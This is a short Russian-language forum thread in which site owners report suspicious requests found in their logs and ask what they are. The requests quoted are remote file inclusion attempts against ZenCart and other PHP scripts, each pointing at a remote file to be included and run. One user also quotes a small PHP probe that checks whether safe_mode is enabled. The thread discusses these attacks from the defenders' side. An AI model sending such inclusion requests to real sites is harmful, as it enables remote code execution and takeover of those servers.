Быстрый лёгкий надёжный форумный движок
Вы не вошли.
Страницы 1
Тема закрыта
Сегодня ночью очень странный запрос был на форуме:
/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://channels.dal.net/irwan/test.txt?
с адреса 85.17.200.74
Зашел по урлу который в запросе прописан, а там какой-то php скрипт прописан
Кто с этим сталкивался?
Дырки ищут? И я так понимаю через настройки сервера.
Или я не прав?
Дырки, но не в настройках сервера, а в движке магазина ZenCart : http://www.xakep.ru/post/33407/default.asp
Ясно
Вот еще странный запрос
/index.php?title=http://angel.yum.pl/joomla/images/borda10.jpg?
Ага была подобная фигня, раза 3.
/viewtopic.php=http://мутный_хостинг.*.jpg
Тоже насторожило. Явно попытка выполнить код.
А вот и содержание якобы gif файла.
<?php
$SafeMode = @ini_get('safe_mode');
if ($SafeMode == '') { $SafeMode = "Modo_Seguro_off"; }
else { $SafeMode = "Modo_Seguro_on"; }
echo $SafeMode;
?>
Чет им интересно стало включен ли сейфмод или нет. Ip дает *****.veloxzone.com.br скрипт был залит на какой-то словацкий инет-магазин.
Озадачилсо...
На уровне браузера с этой бякой борются или нет? Интересно.
Страницы 1
Тема закрыта